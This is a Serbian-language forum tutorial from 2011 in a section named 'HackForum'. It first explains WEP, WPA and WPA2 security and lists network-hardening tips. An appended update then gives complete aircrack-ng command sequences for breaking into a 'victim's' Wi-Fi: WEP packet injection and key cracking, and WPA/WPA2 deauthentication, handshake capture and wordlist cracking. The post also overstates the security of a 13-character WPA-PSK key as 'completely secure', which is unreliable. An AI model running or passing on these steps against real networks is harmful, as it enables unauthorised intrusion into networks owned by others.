ultraadown

Ultra down free forum
 
PrijemKalendarFAQ - Često Postavljana PitanjaTražiLista članovaKorisničke grupeRegistruj sePristupi

Share | 
 

  Wireless mrere (WIFI)

Pogledaj prethodnu temu Pogledaj sledeću temu Ići dole 
AutorPoruka
Admin
Admin


Broj poruka : 141
Datum upisa : 29.12.2011

PočaljiNaslov: Wireless mrere (WIFI)   Čet Dec 29, 2011 3:36 pm

Zdravo u ovom tutorijalu cu vam objasniti koje vrste Wi-Fi mreza postoje.

Start

- - - - - - - - - - - - - - -

Wi-Fi mreže nude tri opcije zaštite: WEP, WPA i WPA2.


WEP (Wired Equivalent Privacy) je jedan od starijih vidova zastite nastao davne 1999.
To je jedan od prostijih vidova zastite koji koristi u 64-bitnoj i 128-bitnoj varijanti.
WEP vam pruza lazan osecaj 'sigurnosti', jer uz odredjen alat i znanje lagano moze da se provali.

Danas u svetu veliki broj korisnika korisit ovaj vid zastitte, sto naravno ne valja.

- - - - - - -

WPA/WPA2 (Wi-Fi Protected Access) su protokoli izvedeni iz 802.11i standarda i mnogo su bezbedniji od WEP-a.

WPA tehnički predstavlja sertifikaciju i ukljucuje samo jedan sigurnosni protokol TKIP. WPA dozvoljava dve vrste autentifikacije: WPA-802.1x (WPA-Enterprise) i WPA-PSK.
WPA-802.1x (RADIUS) podrazumeva da postoji RADIUS (Remote Authentication Dial-in User Service) server u mreži. RADIUS server vrši autentifikaciju na osnovu sertifikata koji su ranije dodeljeni klijentskim stanicama i ne dozvoljava pristup nikome ko ne poseduje validan sertifikat.

Druga pod vrsta WPA je WPA-PSK
Kucno okruzenje kao sto je WPA-PSK za autorizaciju koristi lozinku dužine od 8 do 63 karaktera koja mora biti uneta i na klijentu i na pristupnoj tački (access point).
Preprocena duzina lozinke je 13 znakova. To omogucava da se izbegne bruteforce napad.Ovo je potpuno bezbedan protocol.

- - - - - - - -

WPA2 je, takođe, sertifikacija i uključuje dva standarda TKIP i CCMP. Ukoliko koristite TKIP nije važno da li je vaš uređaj WPA ili WPA2. Najbolja opcija za sigurnost bežične mreže predstavlja CCMP sigurnosni protokol i jedino je dostupan kod WPA2 uređaja. Postoje i neke teškoće pri konfiguraciji WPA2.

##################
Saveti kako se zastiti !!!##
##################

1. Aktivirajte 802.11 enkrpciju
2. Koristite IPSec-Based VPN (Virtual Private Network) tehnologiju
3. Podesite 802.1x autentifikaciju za kontrolu pristupa mreži
4. Uspostavite bežičnu mrežu na odvojenom VLAN
5. Osigurajte da imate najnoviji firmware na klijentskim karticama i baznoj stanici (Access point – pristupna tačka)
6. Osigurajte da samo ovlašćeni zaposleni mogu resetovati pristupnu tačku (baznu stanicu)
7. Isključite pristupni uređaj u periodu kada ga ne koristite
8. Obezbedite sigurnu lozinku
9. Instalirajte firewall na svakom računaru u mreži
10. Smanjite propagaciju (širenje) radio talasa izvan zgrade
11. Upoznajte zaposlene sa sigurnosnim protokolima
12. Obazrivo delite sadržaj hard diska ostalim korisnicima mreže
13. Najvažnije podatke dodatno obezbedite
Najvažnije podatke možete staviti u .zip ili .rar fasciklu i obezbediti je nekom kompleksnijom lozinkom.



[UPDATE]

da bi provalili bilo koji od ovih WEP, WPA, WPA2 to se radi Bruteforce napadom.

U BackTracku dobijate i sve potrebne toolove.
Postoji i za Win Platformu.
Tool mozete skinuti odavde : http://www.aircrack-ng.org/
Krenimo

WEP Hacking

U konzoli kucajte :
Quote:
airmon-ng
airmon-ng stop wlan0
wlan0 ili mon0 zavisi koji interface imate.
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -w wep -c (na kom je kanalu zrtva) --bssid (mak adresa zrtve) wlan0
aireplay-ng -1 0 -a (mak adresa zrtve) wlan0
aireplay-ng -3 -b (mak adresa zrtve) wlan0

Kada naskupite najmanje 5000 packetsa mozete nastaviti sa tutorijalom.

Sada je samo potrebno da ukucate

aircrack-ng wep-01.cap

i KEY FOUND.



WPA/WPA2 Hacking [Isti princip za obadva]

Quote:
airmon-ng
airmon-ng stop wlan0
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c (na kom kanalu je zrtva) -w wpa (mozete da stavite bilo koje ime) --bssid (mak adresa zrtve) wlan0
aireplay-ng -0 5 -a (mak adresa zrtve) -c (copy client mak adresa) wlan0

Kada vam bude pisalo :

WPA HANDSHAKE

napad je otpoceo.

Zavrsna komanda je:

aircrack-ng -w (wordlista).txt -b (mak adresa zrtve) wpa-01.cap (ili tipa koje ste ime stavili gore moze i balkan-01.cap

Nadam se da sam uspeo da vam objasnim, ako ima sta nejasno slobodno pitajte i naravno neka slobodno ako ima neko nesto da doda, osecajte se slobodnim.
Nazad na vrh Ići dole
Pogledaj profil korisnika http://ultradownfreeforum.go-ogler.com
 
Wireless mrere (WIFI)
Pogledaj prethodnu temu Pogledaj sledeću temu Nazad na vrh 
Strana 1 od 1

Dozvole ovog foruma:Ne možete odgovarati na teme u ovom forumu
ultraadown :: HackForum :: Tutitrujali-
Skoči na: